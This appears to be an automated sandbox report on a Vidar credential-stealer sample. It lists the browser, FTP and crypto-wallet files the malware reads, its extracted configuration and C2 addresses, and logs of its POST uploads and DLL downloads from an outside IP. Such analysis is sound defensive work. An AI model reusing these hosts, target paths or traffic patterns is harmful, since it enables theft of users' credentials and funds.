Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7564, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.file.exe.3ec5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3ec5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7564, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C930C40 sqlite3_bind_zeroblob,	3_2_6C930C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C930D60 sqlite3_bind_parameter_name,	3_2_6C930D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C858EA0 sqlite3_clear_bindings,	3_2_6C858EA0

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
78.46.229.36	unknown	Germany		24940	HETZNER-ASDE	true
104.112.44.153	steamcommunity.com	United States		16625	AKAMAI-ASUS	false

Contacted Domains

Name	IP	Active
steamcommunity.com	104.112.44.153	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://78.46.229.36/msvcp140.dll	true	Avira URL Cloud: malware	unknown
https://78.46.229.36/mozglue.dll	true	Avira URL Cloud: malware	unknown
https://78.46.229.36/	true	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://78.46.229.36/softokn3.dll	true	Avira URL Cloud: malware	unknown
https://78.46.229.36/freebl3.dll	true	Avira URL Cloud: malware	unknown
https://78.46.229.36/nss3.dll	true	Avira URL Cloud: malware	unknown
https://78.46.229.36/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
https://78.46.229.36/sqlm.dll	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199658817715	false		high

AV Detection

Antivirus detection for URL or domain

Source: https://78.46.229.36/msvcp140.dllxE	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/Hos	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/U&	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/msvcp140.dll	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/~&	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/mozglue.dll	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/softokn3.dll	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/freebl3.dll	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/ramData	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/nss3.dll	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/mozglue.dll2E	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/p&	Avira URL Cloud: Label: malware
Source: https://78.46.229.36	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/msvcp140.dllnE	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/nes	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/softokn3.dllBE	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/d	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/sqlm.dll	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/g	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/2	Avira URL Cloud: Label: malware
Source: https://78.46.229.36/B	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199658817715"], "Botnet": "90027e35f6cb548480a6fb8bd7cde0cf", "Version": "8.7"}

Multi AV Scanner detection for submitted file

Source: file.exe

Virustotal: Detection: 29%

Perma Link

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00406EB0 CryptUnprotectData,LocalAlloc,LocalFree,	3_2_00406EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409110 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,lstrcat,PK11_FreeSlot,lstrcat,	3_2_00409110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004115E0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	3_2_004115E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00406E30 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	3_2_00406E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	3_2_6C6E6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8AA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	3_2_6C8AA9A0

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.112.44.153:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.46.229.36:443 -> 192.168.2.4:49732 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source:	Binary string: mscorlib.pdb source: WERD260.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdbRSDS source: WERD260.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdb source: WERD260.tmp.dmp.6.dr
Source:	Binary string: Friendly.pdb source: WERD260.tmp.dmp.6.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source:	Binary string: System.pdb4 source: WERD260.tmp.dmp.6.dr
Source:	Binary string: System.Core.pdb source: WERD260.tmp.dmp.6.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERD260.tmp.dmp.6.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.dr
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source:	Binary string: c:\nconvxoz3\obj\Release\Friendly.pdb source: file.exe
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source:	Binary string: System.ni.pdb source: WERD260.tmp.dmp.6.dr
Source:	Binary string: System.pdb source: WERD260.tmp.dmp.6.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERD260.tmp.dmp.6.dr
Source:	Binary string: System.Core.ni.pdb source: WERD260.tmp.dmp.6.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	3_2_00401110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D200 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00416310 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	3_2_00416310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004173B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_004173B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A410 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040A410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00416B50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_00416B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040AF10 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040AF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A860 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040A860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00416FA0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	3_2_00416FA0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00416750 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,

3_2_00416750

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199658817715

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /profiles/76561199658817715 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 78.46.229.36 78.46.229.36
Source: Joe Sandbox View	IP Address: 104.112.44.153 104.112.44.153

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGIDHJKKJDGCBGCGIJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 7117Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlm.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFHJECAKEHIECGIEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGDBFBGIDGIEBGHCGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHDBAECGCAFHJJDAKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAKKFHCFIECAAAKEGCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFHCGIJECFHIDGDBKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBFHDBKJEGHJJJKFIIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDAFBFCFHIDAKFIIEBAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDBGHJKFIDHJJJEBKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGCAFIIECBFIDHIJKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 130713Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIECGCAEBFIIDHIDGIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHDBAECGCAFHJJDAKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
